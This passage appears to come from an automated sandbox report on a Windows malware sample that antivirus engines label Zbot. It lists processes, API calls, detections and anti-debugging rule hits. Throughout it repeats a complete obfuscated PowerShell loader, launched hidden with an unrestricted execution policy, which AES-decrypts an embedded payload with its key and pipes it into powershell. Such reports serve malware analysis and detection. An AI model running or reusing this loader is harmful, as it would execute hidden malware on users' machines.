'amFBcWZOeWJqeFlsREdJbWROT09kWmFVV2pUaEhYc3o=';$CuIweXh = New-Object 'System.Security.Cryptography.AesManaged';$CuIweXh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$CuIweXh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$CuIweXh.BlockSize = 128;$CuIweXh.KeySize = 256;$CuIweXh.Key = [System.Convert]::FromBase64String($rbYLVE);$ZzeKD = [System.Convert]::FromBase64String($sXWykRBF);$xXkozePy = $ZzeKD[0..15];$CuIweXh.IV = $xXkozePy;$MJBVchSHX = $CuIweXh.CreateDecryptor();$knMAOfntz = $MJBVchSHX.TransformFinalBlock($ZzeKD, 16, $ZzeKD.Length - 16);$CuIweXh.Dispose();$AmKl = New-Object System.IO.MemoryStream( , $knMAOfntz );$nmHfSWqs = New-Object System.IO.MemoryStream;$qzLQCznWu = New-Object System.IO.Compression.GzipStream $AmKl, ([IO.Compression.CompressionMode]::Decompress);$qzLQCznWu.CopyTo( $nmHfSWqs );$qzLQCznWu.Close();$AmKl.Close();[byte[]] $WjmlMrK = $nmHfSWqs.ToArray();$girxv = [System.Text.Encoding]::UTF8.GetString($WjmlMrK);$girxv \| powershell -
cmdline	"C:\Windows\system32\cmd.exe" /c powershell.exe $sXWykRBF = 'AAAAAAAAAAAAAAAAAAAAAJpoGWaNf5IdlBmuvwtYV9TVr/VpIoDYevkd9CvadOuHa6CgsxOKFSJyQe5/lXF5b8H9L3qLyr4t4ySRH+9zc9SGvqLkXK50KAkT/W1T9hOe4gq3fVzRNKSn0H7OWSSOr+YXI5c6sEYlAqA/zutoKq4lUdwqwXtqW/yQJpL7pob2jZlCWEBh7dF8Vx41fr/KJJZBzvedXt72yW47z27UrrfjPLvVhw8AiSNBojD3V2wNcSG4dxkq2wXhTcGgAjU57CDSYNY1oPFcxvkkMcd8NlM+Jjv5tSbN65Y6WPkieNrQPmTF1MX7EUtITzzDYmOrV9yVKFfrrW5rThyg1cpRfKM4qJ0GucikSrp6jYKtTcMn8GK1PrTJ6mDmbFEHkBTcwieZhqp/UO8l1He33I9VcIKN466EjIcWdJeyEk/Qgkn+ny9zqy+VO7vdbEMvJYfIzQFx1cJXF0llmvvXVvczx1XRzSWZtqo7aIUXj1n/PYmSH5FjDkm299dbE2/DYXapmV/G89a07mxC7SR6VGh0fOLx8/xj/qh9sT6Ho52ei6fmNZf+y2hP1N7R+++3BcD0zDWMOSnHDiP+BytDWczf1Atmczui2y3Jn7gL2pI9vJ3MT7WV3ZVGJRcAeITqiKnUtIaM/Ojx4tPGVZxhtOD7U1bML/OgUkMGP0s0nPGzOACBJyjbMENvN3sY1c0C8tcrRYp2JXcAJPxvzZrniU53I59hUbnp15mRjm6YMH4whnKIaBYDZpqRVBG0zfpOriy06KPle7wg0GBtz1EJOtHXDc2qOOaa9X/piFXKxXNv4T1zPKdMC9lFDI9S4HCMSsn2PHmRxsHPV1agbpN7uecE39zyW89jwhQOCFpWgEtCTk8Xr/4oTUq8xQSzW4Pd3mCggvEk7ePnzHdvTuAHki9wirFFx/gn2quGL6fmCO6QkVXkKFmMzzCAyl2z5p2tjGk8tM3or4VJ87tr+JsQhg4kjHL/UWFLPodNSMlAyd1yF0ODyMj5V+G0ec2Vhk0eppTY4Q==';$rbYLVE = 'amFBcWZOeWJqeFlsREdJbWROT09kWmFVV2pUaEhYc3o=';$CuIweXh = New-Object 'System.Security.Cryptography.AesManaged';$CuIweXh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$CuIweXh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$CuIweXh.BlockSize = 128;$CuIweXh.KeySize = 256;$CuIweXh.Key = [System.Convert]::FromBase64String($rbYLVE);$ZzeKD = [System.Convert]::FromBase64String($sXWykRBF);$xXkozePy = $ZzeKD[0..15];$CuIweXh.IV = $xXkozePy;$MJBVchSHX = $CuIweXh.CreateDecryptor();$knMAOfntz = $MJBVchSHX.TransformFinalBlock($ZzeKD, 16, $ZzeKD.Length - 16);$CuIweXh.Dispose();$AmKl = New-Object System.IO.MemoryStream( , $knMAOfntz );$nmHfSWqs = New-Object System.IO.MemoryStream;$qzLQCznWu = New-Object System.IO.Compression.GzipStream $AmKl, ([IO.Compression.CompressionMode]::Decompress);$qzLQCznWu.CopyTo( $nmHfSWqs );$qzLQCznWu.Close();$AmKl.Close();[byte[]] $WjmlMrK = $nmHfSWqs.ToArray();$girxv = [System.Text.Encoding]::UTF8.GetString($WjmlMrK);$girxv \| powershell -
cmdline	powershell -
cmdline	powershell.exe $sXWykRBF = 'AAAAAAAAAAAAAAAAAAAAAJpoGWaNf5IdlBmuvwtYV9TVr/VpIoDYevkd9CvadOuHa6CgsxOKFSJyQe5/lXF5b8H9L3qLyr4t4ySRH+9zc9SGvqLkXK50KAkT/W1T9hOe4gq3fVzRNKSn0H7OWSSOr+YXI5c6sEYlAqA/zutoKq4lUdwqwXtqW/yQJpL7pob2jZlCWEBh7dF8Vx41fr/KJJZBzvedXt72yW47z27UrrfjPLvVhw8AiSNBojD3V2wNcSG4dxkq2wXhTcGgAjU57CDSYNY1oPFcxvkkMcd8NlM+Jjv5tSbN65Y6WPkieNrQPmTF1MX7EUtITzzDYmOrV9yVKFfrrW5rThyg1cpRfKM4qJ0GucikSrp6jYKtTcMn8GK1PrTJ6mDmbFEHkBTcwieZhqp/UO8l1He33I9VcIKN466EjIcWdJeyEk/Qgkn+ny9zqy+VO7vdbEMvJYfIzQFx1cJXF0llmvvXVvczx1XRzSWZtqo7aIUXj1n/PYmSH5FjDkm299dbE2/DYXapmV/G89a07mxC7SR6VGh0fOLx8/xj/qh9sT6Ho52ei6fmNZf+y2hP1N7R+++3BcD0zDWMOSnHDiP+BytDWczf1Atmczui2y3Jn7gL2pI9vJ3MT7WV3ZVGJRcAeITqiKnUtIaM/Ojx4tPGVZxhtOD7U1bML/OgUkMGP0s0nPGzOACBJyjbMENvN3sY1c0C8tcrRYp2JXcAJPxvzZrniU53I59hUbnp15mRjm6YMH4whnKIaBYDZpqRVBG0zfpOriy06KPle7wg0GBtz1EJOtHXDc2qOOaa9X/piFXKxXNv4T1zPKdMC9lFDI9S4HCMSsn2PHmRxsHPV1agbpN7uecE39zyW89jwhQOCFpWgEtCTk8Xr/4oTUq8xQSzW4Pd3mCggvEk7ePnzHdvTuAHki9wirFFx/gn2quGL6fmCO6QkVXkKFmMzzCAyl2z5p2tjGk8tM3or4VJ87tr+JsQhg4kjHL/UWFLPodNSMlAyd1yF0ODyMj5V+G0ec2Vhk0eppTY4Q==';$rbYLVE = 'amFBcWZOeWJqeFlsREdJbWROT09kWmFVV2pUaEhYc3o=';$CuIweXh = New-Object 'System.Security.Cryptography.AesManaged';$CuIweXh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$CuIweXh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$CuIweXh.BlockSize = 128;$CuIweXh.KeySize = 256;$CuIweXh.Key = [System.Convert]::FromBase64String($rbYLVE);$ZzeKD = [System.Convert]::FromBase64String($sXWykRBF);$xXkozePy = $ZzeKD[0..15];$CuIweXh.IV = $xXkozePy;$MJBVchSHX = $CuIweXh.CreateDecryptor();$knMAOfntz = $MJBVchSHX.TransformFinalBlock($ZzeKD, 16, $ZzeKD.Length - 16);$CuIweXh.Dispose();$AmKl = New-Object System.IO.MemoryStream( , $knMAOfntz );$nmHfSWqs = New-Object System.IO.MemoryStream;$qzLQCznWu = New-Object System.IO.Compression.GzipStream $AmKl, ([IO.Compression.CompressionMode]::Decompress);$qzLQCznWu.CopyTo( $nmHfSWqs );$qzLQCznWu.Close();$AmKl.Close();[byte[]] $WjmlMrK = $nmHfSWqs.ToArray();$girxv = [System.Text.Encoding]::UTF8.GetString($WjmlMrK);$girxv
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $sXWykRBF = 'AAAAAAAAAAAAAAAAAAAAAJpoGWaNf5IdlBmuvwtYV9TVr/VpIoDYevkd9CvadOuHa6CgsxOKFSJyQe5/lXF5b8H9L3qLyr4t4ySRH+9zc9SGvqLkXK50KAkT/W1T9hOe4gq3fVzRNKSn0H7OWSSOr+YXI5c6sEYlAqA/zutoKq4lUdwqwXtqW/yQJpL7pob2jZlCWEBh7dF8Vx41fr/KJJZBzvedXt72yW47z27UrrfjPLvVhw8AiSNBojD3V2wNcSG4dxkq2wXhTcGgAjU57CDSYNY1oPFcxvkkMcd8NlM+Jjv5tSbN65Y6WPkieNrQPmTF1MX7EUtITzzDYmOrV9yVKFfrrW5rThyg1cpRfKM4qJ0GucikSrp6jYKtTcMn8GK1PrTJ6mDmbFEHkBTcwieZhqp/UO8l1He33I9VcIKN466EjIcWdJeyEk/Qgkn+ny9zqy+VO7vdbEMvJYfIzQFx1cJXF0llmvvXVvczx1XRzSWZtqo7aIUXj1n/PYmSH5FjDkm299dbE2/DYXapmV/G89a07mxC7SR6VGh0fOLx8/xj/qh9sT6Ho52ei6fmNZf+y2hP1N7R+++3BcD0zDWMOSnHDiP+BytDWczf1Atmczui2y3Jn7gL2pI9vJ3MT7WV3ZVGJRcAeITqiKnUtIaM/Ojx4tPGVZxhtOD7U1bML/OgUkMGP0s0nPGzOACBJyjbMENvN3sY1c0C8tcrRYp2JXcAJPxvzZrniU53I59hUbnp15mRjm6YMH4whnKIaBYDZpqRVBG0zfpOriy06KPle7wg0GBtz1EJOtHXDc2qOOaa9X/piFXKxXNv4T1zPKdMC9lFDI9S4HCMSsn2PHmRxsHPV1agbpN7uecE39zyW89jwhQOCFpWgEtCTk8Xr/4oTUq8xQSzW4Pd3mCggvEk7ePnzHdvTuAHki9wirFFx/gn2quGL6fmCO6QkVXkKFmMzzCAyl2z5p2tjGk8tM3or4VJ87tr+JsQhg4kjHL/UWFLPodNSMlAyd1yF0ODyMj5V+G0ec2Vhk0eppTY4Q==';$rbYLVE = 'amFBcWZOeWJqeFlsREdJbWROT09kWmFVV2pUaEhYc3o=';$CuIweXh = New-Object 'System.Security.Cryptography.AesManaged';$CuIweXh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$CuIweXh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$CuIweXh.BlockSize = 128;$CuIweXh.KeySize = 256;$CuIweXh.Key = [System.Convert]::FromBase64String($rbYLVE);$ZzeKD = [System.Convert]::FromBase64String($sXWykRBF);$xXkozePy = $ZzeKD[0..15];$CuIweXh.IV = $xXkozePy;$MJBVchSHX = $CuIweXh.CreateDecryptor();$knMAOfntz = $MJBVchSHX.TransformFinalBlock($ZzeKD, 16, $ZzeKD.Length - 16);$CuIweXh.Dispose();$AmKl = New-Object System.IO.MemoryStream( , $knMAOfntz );$nmHfSWqs = New-Object System.IO.MemoryStream;$qzLQCznWu = New-Object System.IO.Compression.GzipStream $AmKl, ([IO.Compression.CompressionMode]::Decompress);$qzLQCznWu.CopyTo( $nmHfSWqs );$qzLQCznWu.Close();$AmKl.Close();[byte[]] $WjmlMrK = $nmHfSWqs.ToArray();$girxv = [System.Text.Encoding]::UTF8.GetString($WjmlMrK);$girxv \| powershell - }

A process created a hidden window (3 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW March 9, 2023, 10:39 a.m.	thread_identifier: 240 thread_handle: 0x00000000000004ec process_identifier: 1564 current_directory: C:\Users\test22\Desktop filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $sXWykRBF = 'AAAAAAAAAAAAAAAAAAAAAJpoGWaNf5IdlBmuvwtYV9TVr/VpIoDYevkd9CvadOuHa6CgsxOKFSJyQe5/lXF5b8H9L3qLyr4t4ySRH+9zc9SGvqLkXK50KAkT/W1T9hOe4gq3fVzRNKSn0H7OWSSOr+YXI5c6sEYlAqA/zutoKq4lUdwqwXtqW/yQJpL7pob2jZlCWEBh7dF8Vx41fr/KJJZBzvedXt72yW47z27UrrfjPLvVhw8AiSNBojD3V2wNcSG4dxkq2wXhTcGgAjU57CDSYNY1oPFcxvkkMcd8NlM+Jjv5tSbN65Y6WPkieNrQPmTF1MX7EUtITzzDYmOrV9yVKFfrrW5rThyg1cpRfKM4qJ0GucikSrp6jYKtTcMn8GK1PrTJ6mDmbFEHkBTcwieZhqp/UO8l1He33I9VcIKN466EjIcWdJeyEk/Qgkn+ny9zqy+VO7vdbEMvJYfIzQFx1cJXF0llmvvXVvczx1XRzSWZtqo7aIUXj1n/PYmSH5FjDkm299dbE2/DYXapmV/G89a07mxC7SR6VGh0fOLx8/xj/qh9sT6Ho52ei6fmNZf+y2hP1N7R+++3BcD0zDWMOSnHDiP+BytDWczf1Atmczui2y3Jn7gL2pI9vJ3MT7WV3ZVGJRcAeITqiKnUtIaM/Ojx4tPGVZxhtOD7U1bML/OgUkMGP0s0nPGzOACBJyjbMENvN3sY1c0C8tcrRYp2JXcAJPxvzZrniU53I59hUbnp15mRjm6YMH4whnKIaBYDZpqRVBG0zfpOriy06KPle7wg0GBtz1EJOtHXDc2qOOaa9X/piFXKxXNv4T1zPKdMC9lFDI9S4HCMSsn2PHmRxsHPV1agbpN7uecE39zyW89jwhQOCFpWgEtCTk8Xr/4oTUq8xQSzW4Pd3mCggvEk7ePnzHdvTuAHki9wirFFx/gn2quGL6fmCO6QkVXkKFmMzzCAyl2z5p2tjGk8tM3or4VJ87tr+JsQhg4kjHL/UWFLPodNSMlAyd1yF0ODyMj5V+G0ec2Vhk0eppTY4Q==';$rbYLVE = 'amFBcWZOeWJqeFlsREdJbWROT09kWmFVV2pUaEhYc3o=';$CuIweXh = New-Object 'System.Security.Cryptography.AesManaged';$CuIweXh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$CuIweXh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$CuIweXh.BlockSize = 128;$CuIweXh.KeySize = 256;$CuIweXh.Key = [System.Convert]::FromBase64String($rbYLVE);$ZzeKD = [System.Convert]::FromBase64String($sXWykRBF);$xXkozePy = $ZzeKD[0..15];$CuIweXh.IV = $xXkozePy;$MJBVchSHX = $CuIweXh.CreateDecryptor();$knMAOfntz = $MJBVchSHX.TransformFinalBlock($ZzeKD, 16, $ZzeKD.Length - 16);$CuIweXh.Dispose();$AmKl = New-Object System.IO.MemoryStream( , $knMAOfntz );$nmHfSWqs = New-Object System.IO.MemoryStream;$qzLQCznWu = New-Object System.IO.Compression.GzipStream $AmKl, ([IO.Compression.CompressionMode]::Decompress);$qzLQCznWu.CopyTo( $nmHfSWqs );$qzLQCznWu.Close();$AmKl.Close();[byte[]] $WjmlMrK = $nmHfSWqs.ToArray();$girxv = [System.Text.Encoding]::UTF8.GetString($WjmlMrK);$girxv \| powershell - } filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000000000004e4	1	1
ShellExecuteExW March 9, 2023, 10:39 a.m.	show_type: 0 filepath_r: powershell.exe parameters: -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $sXWykRBF = 'AAAAAAAAAAAAAAAAAAAAAJpoGWaNf5IdlBmuvwtYV9TVr/VpIoDYevkd9CvadOuHa6CgsxOKFSJyQe5/lXF5b8H9L3qLyr4t4ySRH+9zc9SGvqLkXK50KAkT/W1T9hOe4gq3fVzRNKSn0H7OWSSOr+YXI5c6sEYlAqA/zutoKq4lUdwqwXtqW/yQJpL7pob2jZlCWEBh7dF8Vx41fr/KJJZBzvedXt72yW47z27UrrfjPLvVhw8AiSNBojD3V2wNcSG4dxkq2wXhTcGgAjU57CDSYNY1oPFcxvkkMcd8NlM+Jjv5tSbN65Y6WPkieNrQPmTF1MX7EUtITzzDYmOrV9yVKFfrrW5rThyg1cpRfKM4qJ0GucikSrp6jYKtTcMn8GK1PrTJ6mDmbFEHkBTcwieZhqp/UO8l1He33I9VcIKN466EjIcWdJeyEk/Qgkn+ny9zqy+VO7vdbEMvJYfIzQFx1cJXF0llmvvXVvczx1XRzSWZtqo7aIUXj1n/PYmSH5FjDkm299dbE2/DYXapmV/G89a07mxC7SR6VGh0fOLx8/xj/qh9sT6Ho52ei6fmNZf+y2hP1N7R+++3BcD0zDWMOSnHDiP+BytDWczf1Atmczui2y3Jn7gL2pI9vJ3MT7WV3ZVGJRcAeITqiKnUtIaM/Ojx4tPGVZxhtOD7U1bML/OgUkMGP0s0nPGzOACBJyjbMENvN3sY1c0C8tcrRYp2JXcAJPxvzZrniU53I59hUbnp15mRjm6YMH4whnKIaBYDZpqRVBG0zfpOriy06KPle7wg0GBtz1EJOtHXDc2qOOaa9X/piFXKxXNv4T1zPKdMC9lFDI9S4HCMSsn2PHmRxsHPV1agbpN7uecE39zyW89jwhQOCFpWgEtCTk8Xr/4oTUq8xQSzW4Pd3mCggvEk7ePnzHdvTuAHki9wirFFx/gn2quGL6fmCO6QkVXkKFmMzzCAyl2z5p2tjGk8tM3or4VJ87tr+JsQhg4kjHL/UWFLPodNSMlAyd1yF0ODyMj5V+G0ec2Vhk0eppTY4Q==';$rbYLVE = 'amFBcWZOeWJqeFlsREdJbWROT09kWmFVV2pUaEhYc3o=';$CuIweXh = New-Object 'System.Security.Cryptography.AesManaged';$CuIweXh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$CuIweXh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$CuIweXh.BlockSize = 128;$CuIweXh.KeySize = 256;$CuIweXh.Key = [System.Convert]::FromBase64String($rbYLVE);$ZzeKD = [System.Convert]::FromBase64String($sXWykRBF);$xXkozePy = $ZzeKD[0..15];$CuIweXh.IV = $xXkozePy;$MJBVchSHX = $CuIweXh.CreateDecryptor();$knMAOfntz = $MJBVchSHX.TransformFinalBlock($ZzeKD, 16, $ZzeKD.Length - 16);$CuIweXh.Dispose();$AmKl = New-Object System.IO.MemoryStream( , $knMAOfntz );$nmHfSWqs = New-Object System.IO.MemoryStream;$qzLQCznWu = New-Object System.IO.Compression.GzipStream $AmKl, ([IO.Compression.CompressionMode]::Decompress);$qzLQCznWu.CopyTo( $nmHfSWqs );$qzLQCznWu.Close();$AmKl.Close();[byte[]] $WjmlMrK = $nmHfSWqs.ToArray();$girxv = [System.Text.Encoding]::UTF8.GetString($WjmlMrK);$girxv \| powershell - } filepath: powershell.exe	1	1
ShellExecuteExW March 9, 2023, 10:47 a.m.	show_type: 0 filepath_r: C:\Windows\system32\cmd.exe parameters: /c powershell.exe $sXWykRBF = 'AAAAAAAAAAAAAAAAAAAAAJpoGWaNf5IdlBmuvwtYV9TVr/VpIoDYevkd9CvadOuHa6CgsxOKFSJyQe5/lXF5b8H9L3qLyr4t4ySRH+9zc9SGvqLkXK50KAkT/W1T9hOe4gq3fVzRNKSn0H7OWSSOr+YXI5c6sEYlAqA/zutoKq4lUdwqwXtqW/yQJpL7pob2jZlCWEBh7dF8Vx41fr/KJJZBzvedXt72yW47z27UrrfjPLvVhw8AiSNBojD3V2wNcSG4dxkq2wXhTcGgAjU57CDSYNY1oPFcxvkkMcd8NlM+Jjv5tSbN65Y6WPkieNrQPmTF1MX7EUtITzzDYmOrV9yVKFfrrW5rThyg1cpRfKM4qJ0GucikSrp6jYKtTcMn8GK1PrTJ6mDmbFEHkBTcwieZhqp/UO8l1He33I9VcIKN466EjIcWdJeyEk/Qgkn+ny9zqy+VO7vdbEMvJYfIzQFx1cJXF0llmvvXVvczx1XRzSWZtqo7aIUXj1n/PYmSH5FjDkm299dbE2/DYXapmV/G89a07mxC7SR6VGh0fOLx8/xj/qh9sT6Ho52ei6fmNZf+y2hP1N7R+++3BcD0zDWMOSnHDiP+BytDWczf1Atmczui2y3Jn7gL2pI9vJ3MT7WV3ZVGJRcAeITqiKnUtIaM/Ojx4tPGVZxhtOD7U1bML/OgUkMGP0s0nPGzOACBJyjbMENvN3sY1c0C8tcrRYp2JXcAJPxvzZrniU53I59hUbnp15mRjm6YMH4whnKIaBYDZpqRVBG0zfpOriy06KPle7wg0GBtz1EJOtHXDc2qOOaa9X/piFXKxXNv4T1zPKdMC9lFDI9S4HCMSsn2PHmRxsHPV1agbpN7uecE39zyW89jwhQOCFpWgEtCTk8Xr/4oTUq8xQSzW4Pd3mCggvEk7ePnzHdvTuAHki9wirFFx/gn2quGL6fmCO6QkVXkKFmMzzCAyl2z5p2tjGk8tM3or4VJ87tr+JsQhg4kjHL/UWFLPodNSMlAyd1yF0ODyMj5V+G0ec2Vhk0eppTY4Q==';$rbYLVE = 'amFBcWZOeWJqeFlsREdJbWROT09kWmFVV2pUaEhYc3o=';$CuIweXh = New-Object 'System.Security.Cryptography.AesManaged';$CuIweXh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$CuIweXh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$CuIweXh.BlockSize = 128;$CuIweXh.KeySize = 256;$CuIweXh.Key = [System.Convert]::FromBase64String($rbYLVE);$ZzeKD = [System.Convert]::FromBase64String($sXWykRBF);$xXkozePy = $ZzeKD[0..15];$CuIweXh.IV = $xXkozePy;$MJBVchSHX = $CuIweXh.CreateDecryptor();$knMAOfntz = $MJBVchSHX.TransformFinalBlock($ZzeKD, 16, $ZzeKD.Length - 16);$CuIweXh.Dispose();$AmKl = New-Object System.IO.MemoryStream( , $knMAOfntz );$nmHfSWqs = New-Object System.IO.MemoryStream;$qzLQCznWu = New-Object System.IO.Compression.GzipStream $AmKl, ([IO.Compression.CompressionMode]::Decompress);$qzLQCznWu.CopyTo( $nmHfSWqs );$qzLQCznWu.Close();$AmKl.Close();[byte[]] $WjmlMrK = $nmHfSWqs.ToArray();$girxv = [System.Text.Encoding]::UTF8.GetString($WjmlMrK);$girxv \| powershell - filepath: C:\Windows\System32\cmd.exe	1	1

File has been identified by 9 AntiVirus engines on VirusTotal as malicious (9 events)

VIPRE	VBS.Heur2.Zbot.4.E20222E1.Gen
BitDefender	VBS.Heur2.Zbot.4.E20222E1.Gen
MicroWorld-eScan	VBS.Heur2.Zbot.4.E20222E1.Gen
FireEye	VBS.Heur2.Zbot.4.E20222E1.Gen
Emsisoft	VBS.Heur2.Zbot.4.E20222E1.Gen (B)
GData	VBS.Heur2.Zbot.4.E20222E1.Gen
Arcabit	VBS.Heur2.Zbot.4.E20222E1.Gen
ALYac	VBS.Heur2.Zbot.4.E20222E1.Gen
MAX	malware (ai score=84)

Checks for the Locally Unique Identifier on the system for a suspicious privilege (3 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW March 9, 2023, 10:47 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW March 9, 2023, 10:47 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW March 9, 2023, 10:47 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3068 CREDAT:145409

Communicates with host for which no DNS query was performed (1 event)

host

117.18.232.200

A command shell or script process was created by an unexpected parent process (1 event)

parent_process

iexplore.exe

martian_process

powershell.exe -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $sXWykRBF = 'AAAAAAAAAAAAAAAAAAAAAJpoGWaNf5IdlBmuvwtYV9TVr/VpIoDYevkd9CvadOuHa6CgsxOKFSJyQe5/lXF5b8H9L3qLyr4t4ySRH+9zc9SGvqLkXK50KAkT/W1T9hOe4gq3fVzRNKSn0H7OWSSOr+YXI5c6sEYlAqA/zutoKq4lUdwqwXtqW/yQJpL7pob2jZlCWEBh7dF8Vx41fr/KJJZBzvedXt72yW47z27UrrfjPLvVhw8AiSNBojD3V2wNcSG4dxkq2wXhTcGgAjU57CDSYNY1oPFcxvkkMcd8NlM+Jjv5tSbN65Y6WPkieNrQPmTF1MX7EUtITzzDYmOrV9yVKFfrrW5rThyg1cpRfKM4qJ0GucikSrp6jYKtTcMn8GK1PrTJ6mDmbFEHkBTcwieZhqp/UO8l1He33I9VcIKN466EjIcWdJeyEk/Qgkn+ny9zqy+VO7vdbEMvJYfIzQFx1cJXF0llmvvXVvczx1XRzSWZtqo7aIUXj1n/PYmSH5FjDkm299dbE2/DYXapmV/G89a07mxC7SR6VGh0fOLx8/xj/qh9sT6Ho52ei6fmNZf+y2hP1N7R+++3BcD0zDWMOSnHDiP+BytDWczf1Atmczui2y3Jn7gL2pI9vJ3MT7WV3ZVGJRcAeITqiKnUtIaM/Ojx4tPGVZxhtOD7U1bML/OgUkMGP0s0nPGzOACBJyjbMENvN3sY1c0C8tcrRYp2JXcAJPxvzZrniU53I59hUbnp15mRjm6YMH4whnKIaBYDZpqRVBG0zfpOriy06KPle7wg0GBtz1EJOtHXDc2qOOaa9X/piFXKxXNv4T1zPKdMC9lFDI9S4HCMSsn2PHmRxsHPV1agbpN7uecE39zyW89jwhQOCFpWgEtCTk8Xr/4oTUq8xQSzW4Pd3mCggvEk7ePnzHdvTuAHki9wirFFx/gn2quGL6fmCO6QkVXkKFmMzzCAyl2z5p2tjGk8tM3or4VJ87tr+JsQhg4kjHL/UWFLPodNSMlAyd1yF0ODyMj5V+G0ec2Vhk0eppTY4Q==';$rbYLVE = 'amFBcWZOeWJqeFlsREdJbWROT09kWmFVV2pUaEhYc3o=';$CuIweXh = New-Object 'System.Security.Cryptography.AesManaged';$CuIweXh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$CuIweXh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$CuIweXh.BlockSize = 128;$CuIweXh.KeySize = 256;$CuIweXh.Key = [System.Convert]::FromBase64String($rbYLVE);$ZzeKD = [System.Convert]::FromBase64String($sXWykRBF);$xXkozePy = $ZzeKD[0..15];$CuIweXh.IV = $xXkozePy;$MJBVchSHX = $CuIweXh.CreateDecryptor();$knMAOfntz = $MJBVchSHX.TransformFinalBlock($ZzeKD, 16, $ZzeKD.Length - 16);$CuIweXh.Dispose();$AmKl = New-Object System.IO.MemoryStream( , $knMAOfntz );$nmHfSWqs = New-Object System.IO.MemoryStream;$qzLQCznWu = New-Object System.IO.Compression.GzipStream $AmKl, ([IO.Compression.CompressionMode]::Decompress);$qzLQCznWu.CopyTo( $nmHfSWqs );$qzLQCznWu.Close();$AmKl.Close();[byte[]] $WjmlMrK = $nmHfSWqs.ToArray();$girxv = [System.Text.Encoding]::UTF8.GetString($WjmlMrK);$girxv | powershell - }

One or more non-whitelisted processes were created (4 events)

parent_process	iexplore.exe	martian_process	powershell.exe -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $sXWykRBF = 'AAAAAAAAAAAAAAAAAAAAAJpoGWaNf5IdlBmuvwtYV9TVr/VpIoDYevkd9CvadOuHa6CgsxOKFSJyQe5/lXF5b8H9L3qLyr4t4ySRH+9zc9SGvqLkXK50KAkT/W1T9hOe4gq3fVzRNKSn0H7OWSSOr+YXI5c6sEYlAqA/zutoKq4lUdwqwXtqW/yQJpL7pob2jZlCWEBh7dF8Vx41fr/KJJZBzvedXt72yW47z27UrrfjPLvVhw8AiSNBojD3V2wNcSG4dxkq2wXhTcGgAjU57CDSYNY1oPFcxvkkMcd8NlM+Jjv5tSbN65Y6WPkieNrQPmTF1MX7EUtITzzDYmOrV9yVKFfrrW5rThyg1cpRfKM4qJ0GucikSrp6jYKtTcMn8GK1PrTJ6mDmbFEHkBTcwieZhqp/UO8l1He33I9VcIKN466EjIcWdJeyEk/Qgkn+ny9zqy+VO7vdbEMvJYfIzQFx1cJXF0llmvvXVvczx1XRzSWZtqo7aIUXj1n/PYmSH5FjDkm299dbE2/DYXapmV/G89a07mxC7SR6VGh0fOLx8/xj/qh9sT6Ho52ei6fmNZf+y2hP1N7R+++3BcD0zDWMOSnHDiP+BytDWczf1Atmczui2y3Jn7gL2pI9vJ3MT7WV3ZVGJRcAeITqiKnUtIaM/Ojx4tPGVZxhtOD7U1bML/OgUkMGP0s0nPGzOACBJyjbMENvN3sY1c0C8tcrRYp2JXcAJPxvzZrniU53I59hUbnp15mRjm6YMH4whnKIaBYDZpqRVBG0zfpOriy06KPle7wg0GBtz1EJOtHXDc2qOOaa9X/piFXKxXNv4T1zPKdMC9lFDI9S4HCMSsn2PHmRxsHPV1agbpN7uecE39zyW89jwhQOCFpWgEtCTk8Xr/4oTUq8xQSzW4Pd3mCggvEk7ePnzHdvTuAHki9wirFFx/gn2quGL6fmCO6QkVXkKFmMzzCAyl2z5p2tjGk8tM3or4VJ87tr+JsQhg4kjHL/UWFLPodNSMlAyd1yF0ODyMj5V+G0ec2Vhk0eppTY4Q==';$rbYLVE = 'amFBcWZOeWJqeFlsREdJbWROT09kWmFVV2pUaEhYc3o=';$CuIweXh = New-Object 'System.Security.Cryptography.AesManaged';$CuIweXh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$CuIweXh.Padding = 